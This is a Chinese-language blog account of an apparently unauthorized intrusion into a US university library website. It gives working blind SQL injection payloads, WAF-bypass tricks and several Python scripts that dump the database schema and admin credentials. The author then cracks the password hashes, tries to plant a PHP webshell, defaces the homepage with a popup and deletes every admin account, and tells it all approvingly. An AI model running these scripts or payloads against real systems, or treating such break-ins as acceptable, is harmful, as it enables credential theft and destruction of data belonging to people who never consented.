记渗透某境外网站

  三叶草三面，要求渗透任意境外网站，第一次渗透网站，很多东西也是第一次接触，python也是看了师傅的代码几小时速成的，拿到了管理员后台密码，可惜的是没有拿到Webshell。

  一个美国大学图书馆的网站，apache+mysql，在GHDB发现这个站点存在inc文件泄漏，包含了部分网页的源代码

  在login.inc中发现了后台登录的网址，现在需要找到一个突破点进入后台。

  拿出AWVS扫描器扫描一通，发现存在SQL注入漏洞，而且居然还存在phpinfo界面

  扫描器给出的payload：

BucknellGettysburgMeetup” AND 321=6 AND “000X801”=”000X801

  用payload试了试，确实存在漏洞，尝试了一下自己修改payload，换成了最常见的1=1，意外的发现加了Mod_Security防火墙，看来接下来有点困难了。

  根据payload的格式，发现AND后均为两个数或者三个数相乘的形式，构造payload如下:

BucknellGettysburgMeetup” AND 1*length(database())=13 AND “000X801”=”000X801

  爆出数据库名长度为13，果断编写脚本爆数据库名,爆出数据库名为:aclcp_Library
  脚本如下：

import requests
import urllib

parameter='BucknellGettysburgMeetup\" AND 1*ascii(substr(database(),%d,1))=%d AND \"000X801\"=\"000X801'

database=[None]*1
database[0]=''

i = 0
j = 1
while i < 13:
	assi = 48
	while assi<123:
		q = urllib.quote(parameter % (j,assi))
		r = requests.get("http://site/?%s" % q)
		if(len(r.text) > 3000):
			database[0] = database[0]+chr(assi)
			print('%c' % chr(assi))
			break
		else:
			assi=assi+1
	j = j + 1
	i = i + 1
print('database_name is %s' % database[0])

  在爆表的数量的时候，用常用的select语句显示被WAF拦截

  反复删减语句发现并没有过滤select,information_schema等内容，赶紧去网上查找相关bypass的资料，但是不清楚WAF版本号，没查到什么有用的信息，尝试了一下用/**/代替空格，竟然神奇般地绕过了。
  尝试了%0a,%0b,%0c等代替空格，发现都成功了，并且发现WAF过滤的是from informtion_schema.tables这个语句，据此估计WAF应该只是过滤了常见的注入语句，而且并没有对可以绕过的字符进行检测，也可以解释最开始将payload中换成1=1为什么会被WAF拦截了。
  payload：

BucknellGettysburgMeetup” AND 1(select/**/count()//from//information_schema.tables//where//table_schema=database())=12 AND “000X801”=”000X801

  爆出有11个表，写脚本爆出表名

  脚本如下：

import requests
import urllib


parameter1='BucknellGettysburgMeetup\" AND 1*(select char_length(table_name) from/**/information_schema.tables where table_schema=database() limit %d,1)=%d AND \"000X801\"=\"000X801'
parameter2='BucknellGettysburgMeetup\" AND 1*(ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/%d),%d,1)))=%d AND \"000X801\"=\"000X801'

i = 0
tables=[None]*11
for d in range(11):
	tables[d]=''

for i in range(6,11):
	length = 1
	j = 1
	while length < 30:
		q1 = urllib.quote(parameter1 % (i,length))
		r1 = requests.get("http://site/?%s" % q1)
		if(len(r1.text) > 3000):
			print('the %d table_length is %d' % (i+1,length))
			break
		else:
			length = length + 1
	while j <= length:
		ascii = 48
		while ascii < 123:
			q2 = urllib.quote(parameter2 % (i,j,ascii))
			r2 = requests.get("http://site/?%s" % q2)
			if(len(r2.text) > 3000):
				print('%c' % chr(ascii)),
				tables[i] = tables[i] + chr(ascii)
				j = j + 1
				break
			else:
				ascii = ascii + 1
	print('table %s found' % tables[i])

  继续爆Users表,发现有9个字段，已经能看到Username和Password字段了

  脚本如下,parameter1爆表中字段数目，parameter2爆字段的字符长度，parameter3爆字段的内容：

import requests
import urllib


parameter1='BucknellGettysburgMeetup\" AND 1*(select count(column_name) from/**/information_schema.columns where table_schema=database() and table_name=\'Users\')=%d AND \"000X801\"=\"000X801'
parameter2='BucknellGettysburgMeetup\" AND 1*(select char_length(column_name) from/**/information_schema.columns where table_schema=database() and table_name=\'Users\' limit %d,1)=%d AND \"000X801\"=\"000X801'
parameter3='BucknellGettysburgMeetup\" AND 1*ascii(substr((select column_name from/**/information_schema.columns where table_schema=database() and table_name=\'Users\' limit %d,1),%d,1))=%d AND \"000X801\"=\"000X801'


colu_num = 0
while True:
	q1 = urllib.quote(parameter1 % colu_num)
	r1 = requests.get("http://site/?%s" % q1)
	if(len(r1.text) > 3000):
		break
	else:
		colu_num = colu_num + 1
print('%d columns found' % colu_num) 

tables=[None]*colu_num
for d in range(colu_num):
	tables[d]=''

for i in range(6,colu_num):
	length = 1
	j = 1
	while length < 30:
		q2 = urllib.quote(parameter2 % (i,length))
		r2 = requests.get("http://site/?%s" % q2)
		if(len(r2.text) > 3000):
			print('the %d column is %d' % (i+1,length))
			break
		else:
			length = length + 1
	while j <= length:
		ascii = 48
		while ascii < 123:
			q3 = urllib.quote(parameter3 % (i,j,ascii))
			r3 = requests.get("http://site/?%s" % q3)
			if(len(r3.text) > 3000):
				print('%c' % chr(ascii)),
				tables[i] = tables[i] + chr(ascii)
				j = j + 1
				break
			else:
				ascii = ascii + 1
	print('\ncolumn %s found' % tables[i])

  接下来爆Username和Password的内容，行数和内容字符长度的查询和前面一样，/**/注释绕过。但是在查Username内容的时候发现了问题，直接select Username…..会被WAF拦截，思考如何才能达到和这个语句同样的效果，之前接触过反引号，试了下用反引号包含Username字段，绕过WAF，用（）包含同样也可以payload。
  查询内容payload如下：

BucknellGettysburgMeetup" AND 1*ascii(substr((select `Username` from Users limit 0,1),1,1))>0 AND "000X801"="000X801

  查询到有三个用户，同理可以查询到密码。

  脚本如下：

import requests
import urllib


parameter1='BucknellGettysburgMeetup\" AND 1*(select count(Webmaster) from Users)=%d AND \"000X801\"=\"000X801'
parameter2='BucknellGettysburgMeetup\" AND 1*(select char_length(Webmaster) from Users limit %d,1)=%d AND \"000X801\"=\"000X801'
parameter3='BucknellGettysburgMeetup\" AND 1*ascii(substr((select `Webmaster` from Users limit %d,1),%d,1))=%d AND \"000X801\"=\"000X801'


colu_num = 0
while True:
	q1 = urllib.quote(parameter1 % colu_num)
	r1 = requests.get("http://site/?%s" % q1)
	if(len(r1.text) > 3000):
		break
	else:
		colu_num = colu_num + 1
print('%d row found' % colu_num) 

tables=[None]*colu_num
for d in range(colu_num):
	tables[d]=''

for i in range(colu_num):
	length = 1
	j = 1
	while length < 35:
		q2 = urllib.quote(parameter2 % (i,length))
		r2 = requests.get("http://site/?%s" % q2)
		if(len(r2.text) > 3000):
			print('the no %d row length %d' % (i+1,length))
			break
		else:
			length = length + 1
	while j <= length:
		ascii = 48
		while ascii < 123:
			q3 = urllib.quote(parameter3 % (i,j,ascii))
			r3 = requests.get("http://site/?%s" % q3)
			if(len(r3.text) > 3000):
				print('%c' % chr(ascii)),
				tables[i] = tables[i] + chr(ascii)
				j = j + 1
				break
			else:
				ascii = ascii + 1
	print('\nrow %s found' % tables[i])

  Password为32位的md5，好在运气还是比较好，试了很多个解密网站后，三个密码都解出来了。
  登录后台，发现并没有太多可以利用的功能，后台可以增加管理员，控制管理员权限，修改文章，新建文章等功能，发现了可以上传文件的地方，马上上传了一张图片试了试，发现可以访问到图片，于是在图片后面加上了一句话木马，并修改后缀为.php.jpg，上传成功，图片没有被正常读取。


  右键图片，获取连接，连接后发现412错误。用Burp拦截http请求并尝试修改之后没有成功。

  然后又尝试了能否通过文件包含包含上传的图片，没有在配置文件找到服务器是怎么根据参数包含文件的，又试了各种绕过姿势，都没有成功包含文件，估计是采用了白名单设置。
  可以修改文章，但是点击修改文章会显示报错。找到一个修改目录html代码的地方，尝试写入一句话木马进去，但是报错了。又试了一下添加一个正常的目录，也报错了，感觉整个后台的功能都有点假。

  唯一在编辑文章里面找到一个XSS漏洞，可以修改onload，已经拿到了管理员密码，感觉没啥用。

  在管理员权限界面找到存在WYSIWYG富文本编辑器，现在就尝试分析泄漏的源码尝试利用这个编辑器。

  找到了很多目录

  在编辑模块下找到了编辑器使用的位置，但是进去后报错，显示Creating object from empty value，网站管理员应该已经禁用了这个编辑器。
  最后从sql注入看看能否写入shell，查询security_file_priv这个变量查询结果为空，至少可以判断写入路径不是确定的。

  尝试直接写入shell试试，遗憾地发现WAF过滤了outfile和dumpfile，写入shell失败。
  很气，没有拿到Webshell，在首页弹窗提醒管理员修改密码，然后把管理员帐号全都给删了(逃